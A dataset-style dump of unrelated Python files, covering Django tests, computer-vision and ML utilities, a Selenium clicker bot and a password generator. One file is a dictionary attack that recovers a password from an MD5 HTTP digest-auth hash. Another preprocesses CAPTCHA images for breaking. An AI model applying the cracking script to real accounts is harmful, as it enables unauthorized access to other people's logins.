18,764 | e2bd4c47b503e1a5c85ad95705d38bd9c5ba724b | from ..serializers.event import EventSerializer
from ..models.event import Event
from rest_framework.viewsets import GenericViewSet, mixins
class EventView(GenericViewSet, mixins.RetrieveModelMixin, mixins.ListModelMixin):
serializer_class = EventSerializer
queryset = Event.objects.all() |
18,765 | 2ecf3c09ca2fa238f14eb05e331be77b66cba1a2 | # -*- coding: utf-8 -*-
"""
Created on Fri Oct 30 14:46:44 2020
@author: Ayman Al Jabri
"""
import cv2
kwargs = {
'scaleFactor':1.1,
'minNeighbors':4,
'minSize':(50,50),
'maxSize':None
}
fname = 'haarcascade_frontalface_default.xml'
class HAAR(cv2.CascadeClassifier):
def __init__(self, fname):
super(HAAR, self).__init__(fname)
self.kwargs = kwargs
self.fname = fname
def find_faces(self,img):
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
return self.detectMultiScale(gray, **self.kwargs)
def draw_rect(self, frame, faces, text='Unknown!'):
if faces is None: return frame
for box in faces:
x,y,h,w = box
cv2.rectangle(frame, (x, y), (x+h, y+w), (80,18,236), 2)
cv2.rectangle(frame, (x, y), (x+h, y-15), (80,18,236), cv2.FILLED)
cv2.putText(frame, text, (x + 6, y - 2), cv2.FONT_HERSHEY_DUPLEX, 0.5, (255, 255, 255), 1)
return frame
|
18,766 | ed227ff48e8d731ddd5f4f5cb9e0fa7c8f19bcd6 | # Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def getIntersectionNode(self, a: ListNode, b: ListNode) -> ListNode:
if a == None or b == None:
return None
else:
len_a , temp_a = 0 , a
while temp_a is not None:
temp_a = temp_a.next
len_a +=1
len_b , temp_b = 0 , b
while temp_b is not None:
temp_b = temp_b.next
len_b +=1
while len_a > len_b :
a = a.next
len_a -=1
while len_b > len_a :
b = b.next
len_b -=1
if len_a == len_b:
while a != b:
a = a.next
b = b.next
return a
|
18,767 | 2b55ae67e891cebeadbb7c05c7bf6f55142736d9 | from django.test import TestCase
from .models import Student
import datetime
from forms import StudentForm
from django.urls import reverse
from django.test import Client
client = Client()
# Create your tests here.
class StudentTestCase(TestCase):
def setUp(self):
self.student = Student(
first_name = "Cynthia",
last_name = "Anyango",
date_of_birth = datetime.date(1996, 9, 11),
gender = "Female",
registration_number = "SCT211-0002/2017",
email = "anyangoc55@gmail.com",
phone_number = "0746574811",
date_joined = datetime.date.today(),
)
def test_full_name_contains_first_name(self):
self.assertIn(self.student.first_name, self.student.full_name())
def test_full_name_contains_last_name(self):
self.assertIn(self.student.last_name, self.student.full_name())
class CreateStudentTestCase(TestCase):
def setUp(self):
self.data = {
"first_name" : "Nikki",
"last_name ": "Antonine",
"date_of_birth ": datetime.date(2006, 12, 12),
"gender" : "Female",
"registration_number ":"SCT211-0004/2017",
"email ": "antonine@gmail.com",
"phone_number ":"0742528493",
"date_joined ":datetime.date.today(),
}
def test_student_form_accepts_valid_data(self):
form = StudentForm(self.data)
self.assertTrue(form.is_valid())
def test_student_form_rejects_invalid_data(self):
form = StudentForm(self.data)
def test add student view(self):
client=Client()
url=reverse("add student")
request=client.post(url,self.data)
self.assertEqual(request.status code,200)
def test add student view rejects bad(self):
client=Client()
url=reverse("add student")
request=client.post(url,self.bad data)
self.assertEqual(request.status code,400)
def test_age_above_18(self):
self.assertFalse(self.student.clean()<18)
def test_age_above_18(self):
self.assertFalse(self.student.clean()>30)
|
18,768 | b9a0f74a4c70be8cd4d06ff21224c1c8f6b07fcf | if __name__ == "__main__":
from datetime import datetime
from models import db, User, Tweet
db.create_all()
u = User(username='johann2357', email='johann2357@gmail.com')
db.session.add(u)
db.session.commit()
tweet = Tweet(
content="My first tweet!", author=u,
pub_date=datetime.utcnow()
)
db.session.add(tweet)
db.session.commit()
tweet = Tweet(
content="My second tweet!!", author=u,
pub_date=datetime.utcnow()
)
db.session.add(tweet)
db.session.commit()
tweet = Tweet(
content="My third tweet!!!", author=u,
pub_date=datetime.utcnow()
)
db.session.add(tweet)
db.session.commit()
u = User(username='tester', email='tester@gmail.com')
db.session.add(u)
db.session.commit()
tweet = Tweet(
content="Test tweet!", author=u,
pub_date=datetime.utcnow()
)
db.session.add(tweet)
db.session.commit()
tweet = Tweet(
content="Test twitter!", author=u,
pub_date=datetime.utcnow()
)
db.session.add(tweet)
db.session.commit()
|
18,769 | 701a383516c7ac9c5493cde28bdb98addb94934d | # -*- coding: utf-8 -*-
"""
@author: Abhilash Raj
Unit Testing module for Steel Eye Assigment
"""
import unittest
from controller import load_config
from helper_functions import *
import os
class TestSteelEye(unittest.TestCase):
@classmethod
def setUpClass(cls):
"""
Class method calls once at the beginning of unit test
"""
# loading the configuration
config = load_config()
cls.url = config.get("sourcefile", "xml_source_url")
# Extracting csv file path
cls.csv_path = config.get("csv", "csv_path")
# Extracting the download path
cls.download_path = config.get("download", "download_path")
# Extracting the required s3 information from config
cls.bucket_name = config.get("aws", "bucket_name")
cls.aws_access_key_id = config.get("aws", "aws_access_key_id")
cls.aws_secret_access_key = config.get("aws", "aws_secret_access_key")
cls.region_name = config.get("aws", "region_name")
def setUp(self):
"""Instance Method called everytime before a test case is executed"""
# Path to xml files
self.xmlfilepath = os.path.join(os.getcwd(), TestSteelEye.download_path)
# Path to csv file
self.csvfile = os.path.join(os.getcwd(), TestSteelEye.csv_path)
def test_download(self):
"""Function to test download function"""
# Test for all correct data
self.assertEqual(
download(TestSteelEye.url, self.xmlfilepath, "sourcefile.xml"),
self.xmlfilepath + os.sep + "sourcefile.xml",
)
# Test for incorrect url
self.assertEqual(
download("http://example.com", self.xmlfilepath, "sourcefile.xml"), ""
)
# Test for different download path
self.assertEqual(
download(
TestSteelEye.url,
os.path.join(os.getcwd(), "anotherpath"),
"sourcefile.xml",
),
os.path.join(os.getcwd(), "anotherpath") + os.sep + "sourcefile.xml",
)
# Test for incorrect download path
self.assertEqual(download(TestSteelEye.url, "E:", "sourcefile.xml"), "")
def test_parse_source_xml(self):
"""Function to test parse_source_xml function"""
# Path to the source xml
file = self.xmlfilepath + os.sep + "sourcefile.xml"
# Path to non existent source file
in_file = self.xmlfilepath + os.sep + "sourcefile.pwg"
# Test for correct data
# NOTE : For this test case to pass the source xml file should be
# present in the download path
self.assertEqual(
parse_source_xml(file),
(
"DLTINS_20210117_01of01.zip",
"http://firds.esma.europa.eu/firds/DLTINS_20210117_01of01.zip",
),
)
# Test for incorrect data
self.assertEqual(parse_source_xml(in_file), None)
def test_unzip_file(self):
"""Function to test unzip_file function"""
# Path to the compressed file
zipped_file = os.path.join(self.xmlfilepath, "DLTINS_20210117_01of01.zip")
# Test for correct data
# NOTE : For this test case to pass the source xml zipped file
# should be present in the download path
self.assertTrue(unzip_file(zipped_file, self.xmlfilepath))
# Test for wrong target path
self.assertFalse(unzip_file(zipped_file, r"D:\kqcA CK j "))
# Test for incorrect compressed file
self.assertFalse(unzip_file("D:\somerandomfile", self.xmlfilepath))
def test_create_csv(self):
"""Function to test create_csv funtion"""
# absolute path to xml file to parse
xml_file = os.path.join(self.xmlfilepath, "DLTINS_20210117_01of01.xml")
# absolute path to the csv file to create
csv_file = os.path.join(self.csvfile, "DLTINS_20210117_01of01.csv")
# Test for correct data
self.assertEqual(create_csv(xml_file, self.csvfile), csv_file)
# Test for incorrect input xml file
self.assertEqual(create_csv("somerandomfile", self.csvfile), None)
# Test for incorrect path to write csv to
self.assertEqual(create_csv(xml_file, r"D:\kqcA CK j "), None)
def aws_s3_upload(self):
"""Function to test aws_s3_upload function"""
# absolute path to the csv file to create
csv_file = os.path.join(self.csvfile, "DLTINS_20210117_01of01.csv")
# Test for correct data
self.assertTrue(
aws_s3_upload(
csv_file,
self.region_name,
self.aws_access_key_id,
self.aws_secret_access_key,
self.bucket_name,
)
)
# Test for non existent bucket
self.assertFalse(
aws_s3_upload(
csv_file,
"useast",
self.aws_access_key_id,
self.aws_secret_access_key,
self.bucket_name,
)
)
# Test for non existent region
self.assertFalse(
aws_s3_upload(
csv_file,
self.region_name,
self.aws_access_key_id,
self.aws_secret_access_key,
"nonexistentbucketname",
)
)
# Test for incorrect keys
self.assertFalse(
aws_s3_upload(
csv_file,
self.region_name,
"xjvachiahvlchabo;jvbo",
"khkc vah haaih aih ika",
self.bucket_name,
)
)
if __name__ == "__main__":
unittest.main()
|
18,770 | 721389f5f4d5a1faa9b63a5fc451c54cce818695 | import os
import tensorflow as tf
slim = tf.contrib.slim
def load_checkpoints(checkpoint_dir, saver):
# Load latest checkpoint if available
all_checkpoint_states = tf.train.get_checkpoint_state(
checkpoint_dir)
if all_checkpoint_states is not None:
all_checkpoint_paths = \
all_checkpoint_states.all_model_checkpoint_paths
# Save the checkpoint list into saver.last_checkpoints
saver.recover_last_checkpoints(all_checkpoint_paths)
else:
print('No checkpoints found')
def get_global_step(sess, global_step_tensor):
# Read the global step if restored
global_step = tf.train.global_step(sess,
global_step_tensor)
return global_step
def create_dir(dir):
"""
Checks if a directory exists, or else create it
Args:
dir: directory to create
"""
if not os.path.exists(dir):
os.makedirs(dir)
def load_model_weights(sess, checkpoint_dir):
"""Restores the model weights.
Loads the weights loaded from checkpoint dir onto the
model. It ignores the missing weights since this is used
to load the RPN weights onto AVOD.
Args:
sess: A TensorFlow session
checkpoint_dir: Path to the weights to be loaded
"""
init_fn = slim.assign_from_checkpoint_fn(
checkpoint_dir, slim.get_model_variables(), ignore_missing_vars=True)
init_fn(sess)
|
18,771 | 77104d0fdbe55bc315535eef532359b15c53263b | #
# Import needed modules
#
import csv
import random
#
# Open files with nouns and adjectives
#
noun_file = open('noun.csv', newline='')
adj_file = open('adjectives.csv', newline='')
#
# Create list of punctuations to pick from
#
punctuation = ['.','.',':','!','?',';','#','$','(',')','[',']','>','<','*']
#
# Read files with nouns and adjectives
#
nouns = csv.reader(open('noun.csv', 'r'))
adjective = csv.reader(open('adjectives.csv', 'r'))
#
# Flatten data, is csv with one column, want with one row
#
datan = sum([i for i in nouns],[]) #To flatten the list
dataa = sum([i for i in adjective],[]) #To flatten the list
print("The length of your password is one of the main factors to crack it")
print("It takes a hacker 0.25s to crack a password of 7 characters, 5 hours for 8, and 5 days for 9 characters ")
print("We recommend a password at least 10 characters long, however some services won't accept that long password yet")
while True:
pwlength=int(input("Please insert your required length of password: "))
if pwlength <4:
print("Sorry, this generator can not create a password shorter than 4 characters!")
else:
break
password = False
length = "short"
while password == False:
while length == "short":
#
# Use random.choice to pick a word from the lists
#
randomnoun=(random.choice(datan))
randomadj=(random.choice(dataa))
#
# Use randint to pick index of punctuation and random number between 0 and 100
#
puncnumber=random.randint(0,len(punctuation)-1)
number=random.randint(0,100)
punctuate=(punctuation[puncnumber])
puncrand=(random.choice(punctuation))
#
# Turn number into string, to enable it being combined with other parts
#
textnumber=str(number)
#
# Capitalize the noun, increasing safety of password
#
noun=randomnoun.upper()
#
# Create unmixed password
#
unmixed=randomadj+noun
if len(unmixed) >= pwlength:
length = "long"
#
# Transform the unmixed password into a list to make use of the random.shuffle function
#
unmixed=unmixed[:pwlength-4]
unmixed=unmixed+punctuate+puncrand+textnumber
pwlist = list(unmixed)
random.shuffle(pwlist)
#
# Recreate a password from the mixed list
#
mixed="".join(pwlist)
#short=mixed[::2]
#short2=mixed[1::2]
#
# print password for user
#
print("\n"+mixed+"\n")
#print("Short version: {}".format(short))
#print("Short version: {}".format(short2))
answer = True
while answer == True:
question=input("Are you happy with this password? (y/n) ")
if question == "y":
print("Great, stay safe in the digital world!")
password = True
elif question == "n":
print("Okay, we'll start over")
answer = False
else:
print("We can only understand y/n answers!!")
answer = True
|
18,772 | a4817c405627a1dd66b39929623677f3b24c3a06 | from atmPy.general import timeseries as _timeseries
from atmPy.data_archives.arm import _netCDF
class ArmDatasetSub(_netCDF.ArmDataset):
def __init__(self,*args, **kwargs):
self._data_period = 60.
self._time_offset = (- self._data_period, 's')
super(ArmDatasetSub,self).__init__(*args, **kwargs)
## Define what is good, patchy or bad data
# self._parse_netCDF()
def _parse_netCDF(self):
super(ArmDatasetSub,self)._parse_netCDF()
# self._data_quality_control()
self.relative_humidity = self._read_variable2timeseries(['rh_25m', 'rh_60m'], column_name='Relative Humidity (%)')
self.temperature = self._read_variable2timeseries(['temp_25m', 'temp_60m'], column_name='Temperature ($^{\circ}$C)')
self.vapor_pressure = self._read_variable2timeseries(['vap_pres_25m', 'vap_pres_60m'], column_name='Vapor pressure (kPa)')
def _data_quality_control(self):
if self.data_quality_flag_max == None:
if self.data_quality == 'good':
self.data_quality_flag_max = 0
elif self.data_quality == 'patchy':
self.data_quality_flag_max = 0
elif self.data_quality == 'bad':
self.data_quality_flag_max = 100000
else:
txt = '%s is not an excepted values for data_quality ("good", "patchy", "bad")'%(self.data_quality)
raise ValueError(txt)
def plot_all(self):
self.relative_humidity.plot()
self.temperature.plot()
self.vapor_pressure.plot()
def _concat_rules(arm_data_objs):
# create class
out = ArmDatasetSub(False)
# populate class with concatinated data
out.relative_humidity = _timeseries.concat([i.relative_humidity for i in arm_data_objs])
out.relative_humidity._data_period = out._data_period
out.temperature = _timeseries.concat([i.temperature for i in arm_data_objs])
out.temperature._data_period = out._data_period
out.vapor_pressure = _timeseries.concat([i.vapor_pressure for i in arm_data_objs])
out.vapor_pressure._data_period = out._data_period
# use time stamps from one of the variables
out.time_stamps = out.relative_humidity.data.index
return out
|
18,773 | 4c0e6a7c1bb50743d79738add775a95beee696ed | import numpy as np
import matplotlib.pyplot as plt
def cross_section(R, L, F_C, show_every = 20, nr = 10, lagre = "N", fs = 10):
"""
plot cross section of star
:param R: radius, array
:param L: luminosity, array
:param F_C: convective flux, array
:param show_every: plot every <show_every> steps
"""
R_sun = 6.96E8 # [m]
L_sun = 3.846E26 # [W]
plt.figure(figsize = (10.5, 10))
fig = plt.gcf()
ax = plt.gca()
r_range = 1.2 * R[0] / R_sun
rmax = np.max(R)
ax.set_xlim(-r_range, r_range)
ax.set_ylim(-r_range, r_range)
ax.set_aspect('equal')
core_limit = 0.995 * L_sun
j = 0
for k in range(0, len(R) - 1):
j += 1
# plot every <show_every> steps
if j%show_every == 0:
if L[k] >= core_limit: # outside core
if F_C[k] > 0.0: # plot convection outside core
circle_red = plt.Circle((0, 0), R[k] / rmax, color = 'red', fill = False)
ax.add_artist(circle_red)
else: # plot radiation outside core
circle_yellow = plt.Circle((0, 0), R[k] / rmax, color = 'yellow', fill = False)
ax.add_artist(circle_yellow)
else: # inside core
if F_C[k] > 0.0: # plot convection inside core
circle_blue = plt.Circle((0, 0), R[k] / rmax, color = 'blue', fill = False)
ax.add_artist(circle_blue)
else: # plot radiation inside core
circle_cyan = plt.Circle((0, 0), R[k] / rmax, color = 'cyan', fill = False)
ax.add_artist(circle_cyan)
# create legends
circle_red = plt.Circle((2 * r_range, 2 * r_range), 0.1 * r_range, color = 'red', fill = True)
circle_yellow = plt.Circle((2 * r_range, 2 * r_range), 0.1 * r_range, color = 'yellow', fill = True)
circle_blue = plt.Circle((2 * r_range, 2 * r_range), 0.1 * r_range, color = 'blue', fill = True)
circle_cyan = plt.Circle((2 * r_range, 2 * r_range), 0.1 * r_range, color = 'cyan', fill = True)
ax.legend([circle_red, circle_yellow, circle_cyan, circle_blue], \
['Convection outside core', 'Radiation outside core', 'Radiation inside core', 'Convection inside core'], \
fontsize = fs)
plt.xlabel(r'$R/R_{\odot}$', fontsize = fs)
plt.ylabel(r'$R/R_{\odot}$', fontsize = fs)
plt.title('Cross section of star', fontsize = fs + 2)
if lagre == "J":
plt.savefig("Figur%02i.png"%nr)
plt.show()
|
18,774 | 90ff1d16c3d8f5fbfe47f6b0a54946998ac4b086 | """
Calcula el espectro de Welch y sus intervalos de confianza segun la dist.
chi2. Se usa un overlap de 50% y se supone que no se hace ningun frequency-
band averaging.
La frecuencia de muestreo es Fs = 1.
@author: Julia Neme
"""
def welch_spectrum(x, npseg, alfa):
from scipy import signal
from scipy.stats import chi2
from matplotlib import pyplot as plt
# Calcula el espectro
nfft = npseg
ovlp = npseg/2
f, Pxx = signal.welch(x, fs=1, nperseg=npseg, noverlap=ovlp)
# Calcula los niveles de confianza
ddof = np.round((8/3)*len(x)/npseg)
c = chi2.ppf([1-alfa/2, alfa/2], ddof)
c = ddof/c
CI_dw = Pxx*c[0]
CI_up = Pxx*c[1]
plt.figure()
plt.plot(f, f*Pxx, color='k')
plt.fill_between(f, f*CI_dw, f*CI_up, color='k', alpha=.5)
plt.xscale('log')
plt.xlabel('log(f)')
plt.ylabel('f*PSD')
plt.show()
plt.close()
PSD = [f, Pxx, CI_dw, CI_up]
return PSD
|
18,775 | bc9af89aef2c1e0e84f26a04fc3717d1de9b4045 | import json
import sys
from nbgrader.api import Gradebook, MissingEntry
# Parse Arguments
assignmentId = sys.argv[1]
notebookName = sys.argv[2]
studentId = sys.argv[3]
notebookId = notebookName.replace(".ipynb", "")
# Create the dict we are going to fill
output = dict()
# Create the connection to the database
with Gradebook('sqlite:///gradebook.db') as gb:
# Try to find the submission in the database. If it doesn't exist, the
# `MissingEntry` exception will be raised, which means notebook submission is not configured correctly
try:
submission = gb.find_submission_notebook(notebookId, assignmentId, studentId)
except MissingEntry:
output["fractionalScore"] = 0.0
output["feedback"] = "Error while grading submission. Please check your submission."
else:
# Calculate score
if submission.max_score == 0:
output["fractionalScore"] = 0.0
else:
frac_score = submission.score/submission.max_score
output["fractionalScore"] = frac_score
# Set the feedback value to show that the grading is complete
output["feedback"] = "Your assignment has been graded"
# Set the feedbackType to match the generated feedback
output["feedbackType"] = "HTML"
# jsonify the output and print it
jsonified_output = json.dumps(output)
print('Feedback JSON: ' + jsonified_output)
with open("/shared/feedback.json", "w") as outfile:
outfile.write(jsonified_output)
|
18,776 | 16e02e27713ae11f49c22cc601c63adf05bd1d99 | import cv2
from PIL import Image
metodos = [
cv2.THRESH_BINARY,
cv2.THRESH_BINARY_INV,
cv2.THRESH_TRUNC,
cv2.THRESH_TOZERO,
cv2.THRESH_TOZERO_INV
]
imagem = cv2.imread('bdcaptcha/telanova1.png')
# transformar a imagem em escala de cinza
imagem_cinza = cv2.cvtColor(imagem, cv2.COLOR_RGB2GRAY)
i = 0
for metodo in metodos:
i += 1
_, imagem_tratada = cv2.threshold(imagem_cinza, 127, 255, metodo or cv2.THRESH_OTSU)
cv2.imwrite(f'testesmetodo/imagem_tratada_{i}.png', imagem_tratada)
imagem = Image.open('testesmetodo/imagem_tratada_3.png')
imagem = imagem.convert('P')
imagem2 = Image.new('P', imagem.size, 255)
for x in range(imagem.size[1]):
for y in range(imagem.size[0]):
cor_pixel = imagem.getpixel((y, x))
if cor_pixel < 115:
imagem2.putpixel((y, x), 0)
imagem2.save('testesmetodo/imagemfinal.png')
|
18,777 | c8a653b521d8670271a7fb16c29613e1e49baced | from time import sleep
from selenium import webdriver
from selenium.common.exceptions import (NoSuchElementException,
StaleElementReferenceException)
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.ui import WebDriverWait
chrome_driver_path = "/Users/anhollow/Programming/Utilities/chromedriver"
driver = webdriver.Chrome(executable_path=chrome_driver_path)
ignored_exceptions = (NoSuchElementException, StaleElementReferenceException)
def click_cookie():
try:
cookie.click()
except:
pass
def buy_item(id):
if (item := get_element(id)):
try:
item.click()
except:
pass
def get_style(id):
style = None
if (item := get_element(id)):
try:
style = item.get_attribute("style")
except:
pass
return style if style else ""
def get_class(id):
class_ = None
if (item := get_element(id)):
try:
class_ = item.get_attribute('class')
except:
pass
return class_ if class_ else ""
def get_element(id):
element = None
try:
element = WebDriverWait(driver, 10, ignored_exceptions=ignored_exceptions).until(
expected_conditions.presence_of_element_located((By.ID, id))
)
except:
pass
return element if element else None
driver.get("http://orteil.dashnet.org/experiments/cookie/")
money = get_element("money")
things_to_buy = [
"buyElder Pledge",
"buyTime machine",
"buyPortal",
"buyAlchemy lab",
"buyShipment",
"buyMine",
"buyFactory",
"buyGrandma",
"buyCursor",
]
cookie = get_element("cookie")
while cookie:
for i in range(20):
click_cookie()
for _, id in enumerate(things_to_buy):
if id == "buyElder Pledge":
if "block" in get_style(id):
buy_item(id)
else:
if "grayed" not in get_class(id):
buy_item(id) |
18,778 | 9075bde74b050087521416807d4274f9b99160ae | from dataclasses import dataclass
from datetime import date, datetime
from typing_extensions import Annotated
from mashumaro import DataClassDictMixin
from mashumaro.config import BaseConfig
def test_annotated():
@dataclass
class DataClass(DataClassDictMixin):
x: Annotated[date, None]
obj = DataClass(date(2022, 2, 6))
assert DataClass.from_dict({"x": "2022-02-06"}) == obj
assert obj.to_dict() == {"x": "2022-02-06"}
def test_annotated_with_overridden_methods():
@dataclass
class DataClass(DataClassDictMixin):
foo: Annotated[date, "foo"]
bar: Annotated[date, "bar"]
baz: Annotated[date, "baz"]
class Config(BaseConfig):
serialization_strategy = {
Annotated[date, "foo"]: {
"serialize": date.toordinal,
"deserialize": date.fromordinal,
},
Annotated[date, "bar"]: {
"serialize": date.isoformat,
"deserialize": date.fromisoformat,
},
date: {
"serialize": lambda x: x.strftime("%Y%m%d"),
"deserialize": (
lambda x: datetime.strptime(x, "%Y%m%d").date()
),
},
}
obj = DataClass(
foo=date(2023, 6, 12),
bar=date(2023, 6, 12),
baz=date(2023, 6, 12),
)
obj.foo.strftime("%Y%M%D")
assert (
DataClass.from_dict(
{"foo": 738683, "bar": "2023-06-12", "baz": "20230612"}
)
== obj
)
assert obj.to_dict() == {
"foo": 738683,
"bar": "2023-06-12",
"baz": "20230612",
}
|
18,779 | cccd87b27e96d956c244bf0ea2199ad8e94e1f9f | import logging
from rest_framework.renderers import JSONRenderer
from api.v1.user.serializers import UserSerializer
from support.models import SupportRequest
from user.autologout import SessionExpire
# format json response
# https://google-styleguide.googlecode.com/svn/trunk/jsoncstyleguide.xml
class ApiRenderer(JSONRenderer):
def render(self, data, media_type=None, renderer_context=None):
"""
NB. be sure that settings.REST_FRAMEWORK contains:
'EXCEPTION_HANDLER': '...api_exception_handler',
"""
logger = logging.getLogger(__name__)
wrapper = {
'version': '2',
'data': {},
'meta': {},
}
# move error to the root level
if hasattr(data, 'get') and data.get('error'):
wrapper['error'] = data['error']
del data['error']
if data is not None:
wrapper['data'] = data
try:
response = renderer_context['response']
request = renderer_context['request']
if 200 <= response.status_code < 400:
meta = {}
session_expire = SessionExpire(request)
meta['session_expires_on'] = session_expire.expire_time()
sr = SupportRequest.get_current(request, as_obj=True)
if sr:
meta['support_request'] = {
'ticket': sr.ticket,
'user': UserSerializer(instance=sr.user).data,
}
wrapper['meta'] = meta
except (TypeError, KeyError) as e:
logger.error("Missing parameteres (%s)", e)
return super(ApiRenderer, self).render(wrapper, media_type,
renderer_context)
|
18,780 | 1c4867421c67b9e19ee0d72cbd36f5451733abd4 | import hashlib
file = open('words.txt','r')
content = file.readlines()
file.close()
word_list = []
for line in content:
line = line.strip()
word_list.append(line)
username= input("Username: ")
realm = "Boutique Cassee"
#178ec06684f4d2ca85f4d704eff5ac1d
hashToFind = input("Password hash: ")
for word in word_list:
u_p = username+":"+realm+":"+word
hash = hashlib.md5(u_p.encode()).hexdigest()
if hash == hashToFind:
print('The password is: ',word)
|
18,781 | fc0a5095c7f20f9bff5de1c582d3acbcb8b279bd | #!/usr/bin/python
import itertools
#lines: Prime numbers sieve w/fancy generators
def iter_primes():
numbers = itertools.count(2)
while True:
prime = numbers.next()
yield prime
numbers = itertools.ifilter(prime.__rmod__, numbers)
for p in iter_primes():
if p > 500:
break
print p
|
18,782 | 5d4d9f6d9a4685d11662a2f31bab7039b81d6780 | # Задача 2. Вариант 10.
# Напишите программу, которая будет выводить на экран наиболее понравившееся вам высказывание,
# автором которого является Юстиниан. Не забудьте о том, что автор должен быть упомянут на отдельной строке.
# Kondrashkina
# 15.09.2016
print ("Свобода есть естественная способность каждого делать то, что ему угодно, если это не запрещено силой или правом.")
print ("")
print (" Юстиниан.")
input ("\n\nНажмите Enter для выхода.")
|
18,783 | 7dc2068907e87e7f4ab7c28b5cefbcc7cf2c682d | import ssl
ssl._create_default_https_context = ssl._create_unverified_context
import argparse
import tensorflow as tf
import tensorflow_hub as hub
import h5py
import numpy as np
import json
print((tf.__version__))
from util import set_gpus
def Elmo(fn, outfn):
with open(fn) as f:
dev_examples = [json.loads(jsonline) for jsonline in f.readlines()]
sents = [example["sentences"] for example in dev_examples]
docids = [example["doc_key"] for example in dev_examples]
config = tf.ConfigProto()
with tf.Session(config=config) as sess:
sess.run(tf.global_variables_initializer())
with h5py.File(outfn) as fout:
#for line in fin:
for i in range(len(sents)):
if i % 100 == 0:
print(('Finished ' + str(i)))
doc = sents[i]
docid = docids[i]
for j in range(len(doc)):
sent = [doc[j]]
slen = [len(doc[j])]
lm_emb = sess.run(
lm_emb_op, feed_dict={
sentences: sent,
text_len: slen
}
)
sentence_id = docid + '_' + str(j)
ds = fout.create_dataset(
sentence_id, lm_emb.shape[1:], dtype='float32',
data=lm_emb[0, :, :, :] # [slen, lm_size, lm_layers]
)
fout.close
#### Model #####
parser = argparse.ArgumentParser()
parser.add_argument('--input', required=True)
parser.add_argument('--output', required=True)
args = parser.parse_args()
set_gpus(0)
elmo = hub.Module("https://tfhub.dev/google/elmo/1", trainable=True)
sentences = tf.placeholder('string', shape=(None, None))
text_len = tf.placeholder('int32', shape=(None))
print("READY TO PARSE ELMO")
lm_embeddings = elmo(
inputs={
"tokens": sentences,
"sequence_len": text_len
},
signature="tokens", as_dict=True)
word_emb = tf.expand_dims(lm_embeddings["word_emb"], 3) # [B, slen, 512]
lm_emb_op = tf.concat([
tf.concat([word_emb, word_emb], 2), # [B, slen, 1024, 1]
tf.expand_dims(lm_embeddings["lstm_outputs1"], 3),
tf.expand_dims(lm_embeddings["lstm_outputs2"], 3)], 3) # [B, slen, 1024, 3]
Elmo(args.input, args.output)
|
18,784 | aef5b547fa904e2f061b7ca22c9181ab064310da | import nltk
nltk.download('stopwords')
nltk.download('wordnet')
from nltk.corpus import stopwords
from nltk.corpus import wordnet
wn_senses = set()
wn_senses.update(['illness.n.01', 'disorder.n.01', 'medicine.n.02', 'drug.n.01',
'ill_health.n.01', 'injury.n.01', 'distress.n.01',
'pain.n.02', 'pain.n.01', 'disease.n.01',
'condition.n.01', 'organ.n.01', 'symptom.n.01',
'liquid_body_substance.n.01', 'bodily_property.n.01',
'tumor.n.01'])
custom_stop_words = ["few", "little", "much", "more", "cause", "symptom", "treatment", "prevent"]
wn_stop_words = set(stopwords.words('english'))
wn_stop_words.update(custom_stop_words)
class QueryFormulator:
"""
Prepare the queries for the DocumentRetriever
Look for direct related query keywords
If sense is not found
Then use focus word as query
"""
def __init__(self, q_classifer):
self.q_classifer = q_classifer
self.stop_words = wn_stop_words
self.senses = self.find_senses(self.q_classifer.tokens)
self.queries = self.find_queries(self.senses)
def find_queries(self, senses):
"""
If the words match the senses
Add to the queries list
If no senses, use focus word as query
:param senses:
:return list: the query that will be used for PassageRetriever. Sample: {'cancer', 'aspirin'}
"""
queries = set()
for token in senses:
queries.add(token)
if (len(queries) == 0):
focus = self.q_classifer.matched_groups['focus'].split()
focus = [f for f in focus if f not in set(stopwords.words('english'))]
queries = focus
return queries
def find_senses(self, tokens):
""" Get all the senses of word and hypernym
:return dict: senses {'aspirin': 'medicine.n.02', 'cancer': 'tumor.n.01'}
"""
senses = dict()
for token in tokens:
senses_tmp = set()
if token not in self.stop_words:
w_syns = wordnet.synsets(token)
senses_tmp.update(self.find_hypernyms(w_syns))
for sense in senses_tmp:
if sense in wn_senses:
senses.update({token: sense})
return senses
def find_hypernyms(self, syns):
"""
Loop through hypernyms tree and find senses
:param syns:
:return:
"""
names = set()
# Find hypernyms of each syn
for syn in syns:
hypernyms = syn.hypernyms()
# find hypernyms one more level up
for hypernym in hypernyms:
names.add(hypernym.name())
hypernyms_second = hypernym.hypernyms()
for h in hypernyms_second:
names.add(h.name())
return names
if __name__ == "__main__":
"""
For testing purpose
This file require QuestionClassifier
Run this file to see details as described below
"""
from question_classifier import QuestionClassifier
questions = [
"Who do I contact if I have coronavirus?"
# "what are the treatment for hay fever",
# "treatment for hay fever",
# "what are the symptoms of hay fever",
# "what is hay fever",
# "what cause depression",
# "how many times do i take aspirin in a day",
# "where does acne occur most",
# "where do i go to take vaccine for hay fever",
# "why do i have hay fever",
# "who do i contact if i have hay fever",
# "is aspirin lethal",
# "Can ADHD cause depression",
# "what do i do if i have fever",
# "What happens during a diagnosis of adult ADHD?"
]
for q_ in questions:
print("=======================")
print(q_)
q_classifier = QuestionClassifier(q_)
q = QueryFormulator(q_classifier)
print("Senses:", q.senses) # {'aspirin': 'medicine.n.02', 'cancer': 'tumor.n.01'}
print("Queries:", q.queries) # {'cancer', 'aspirin'}
|
18,785 | 33a7c93abb29dd5e7ea81778b396365f75fdf18c | _base_ = [
'../_base_/models/pointpillars_hv_secfpn_waymo.py',
'../_base_/datasets/waymoD5-3d-3class.py',
'../_base_/schedules/schedule-2x.py',
'../_base_/default_runtime.py',
]
|
18,786 | 1336594f7c1b6145d8a21f761e8748694d0cdaa8 | task=[]
status=[]
user=int(input("enter the how many task : "))
i=0
while i<user:
t=input("enter the task : ")
task.append(t)
print(task)
s=input("enter the status : ")
status.append(s)
print(status)
i=i+1
c=0
p=len(task)
p=len(status)
while c<p:
print(task[c],"=",status[c])
c=c+1
user=input("what you want to do ? ")
if user=="add":
task1=input("enter tha task u want to do : ")
status2=input("enter the statu u want to do : ")
task.append(task1)
status.append(status2)
c=0
p=len(task)
p=len(status)
while c<p:
print(task[c],"=",status[c])
c=c+1
user1=input("what you want to do ? ")
if user1=="remove":
task3=input("enter the task : ")
status4=input("enter the status : ")
task.remove(task3)
status.remove(status4)
c=0
p=len(task)
p=len(status)
